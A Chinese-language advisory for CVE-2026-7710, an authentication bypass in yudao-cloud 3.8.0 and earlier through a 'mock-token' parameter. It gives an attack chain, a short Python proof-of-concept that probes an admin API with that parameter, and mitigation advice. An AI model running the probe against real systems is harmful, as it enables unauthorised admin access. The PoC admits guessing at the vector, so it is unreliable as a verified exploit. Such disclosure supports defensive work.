CVE-2026-7710: yudao-cloud身份验证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-7710

漏洞类型

身份验证绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

YunaiV yudao-cloud

漏洞概述

YunaiV yudao-cloud是基于Ruoyi-Vue-Pro的微服务版本。在3.8.0及以下版本中，其组件JwtAuthenticationTokenFilter.java存在安全缺陷。攻击者可通过操纵“mock-token”参数导致身份验证不当，从而绕过登录验证。该漏洞允许远程无交互利用，影响系统机密性、完整性和可用性，且利用代码已公开。

技术细节

该漏洞的核心成因在于YunaiV yudao-cloud项目中集成的Ruoyi-Vue-Pro组件的JWT过滤器处理逻辑存在严重缺陷。具体来说，在JwtAuthenticationTokenFilter.java文件的doFilterInternal方法中，系统对“mock-token”参数的处理缺乏严格的校验机制。攻击者可以利用这一疏忽，通过发送特制的HTTP请求，并在其中附加上经过构造的“mock-token”参数值。当请求到达服务器时，由于代码逻辑错误，后端会将此伪造参数误认为合法的认证凭证，从而绕过了原本必须执行的复杂JWT签名验证和权限检查流程。这种身份验证绕过漏洞允许未经身份验证的远程攻击者直接接管用户会话或访问后台管理接口。鉴于其CVSS评分达到7.3，且无需用户交互即可触发，该漏洞对部署了受影响版本的企业构成了极高的安全风险。

攻击链分析

STEP 1

侦察阶段

攻击者识别出目标系统运行的是YunaiV yudao-cloud，且版本在3.8.0及以下。

STEP 2

漏洞利用

攻击者向受影响端点发送特制的HTTP请求，在请求参数或头部中注入“mock-token”参数。

STEP 3

身份绕过

后端服务错误地验证了伪造的token，绕过了标准的JWT认证机制，赋予攻击者访问权限。

STEP 4

非法操作

攻击者利用获取的权限访问敏感数据、修改系统配置或进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    """
    PoC for CVE-2026-7710: Authentication Bypass via mock-token
    """
    # The vulnerable endpoint usually requires authentication,
    # e.g., getting user info or admin config.
    target_endpoint = f"{target_url}/admin-api/system/user/get"

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/json"
    }

    # Exploit vector: Injecting the 'mock-token' parameter/header
    # Based on the description, manipulating this argument bypasses auth.
    # This is often implemented as a debug feature left enabled.
    exploit_data = {
        "mock-token": "admin-bypass-poc"
    }
    
    # In some implementations, it might be a header, others a query param.
    # Trying as a query param first based on "argument" description.
    try:
        response = requests.get(target_endpoint, params=exploit_data, headers=headers, timeout=10)
        
        if response.status_code == 200 and "data" in response.text:
            print(f"[+] Potential Vulnerability Detected at {target_url}")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Target does not appear vulnerable or endpoint changed.")
            print(f"Status Code: {response.status_code}")
            
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080" # Replace with actual target
    check_vulnerability(target)

影响范围

YunaiV yudao-cloud <= 3.8.0

防御指南

临时缓解措施

目前官方尚未发布修复补丁。建议临时通过修改代码注释掉或删除JwtAuthenticationTokenFilter中关于mock-token的判断逻辑，确保所有请求必须经过严格的JWT签名验证。同时，加强网络边界防护，限制对管理接口的访问来源。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7710
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7710
3 Details https://www.cvedetails.com/cve/CVE-2026-7710/
4 VulDB https://vuldb.com/cve/CVE-2026-7710
5 Link https://github.com/9str0IL/CVE/issues/5
6 Link https://vuldb.com/submit/806493
7 Link https://vuldb.com/vuln/360886
8 Link https://vuldb.com/vuln/360886/cti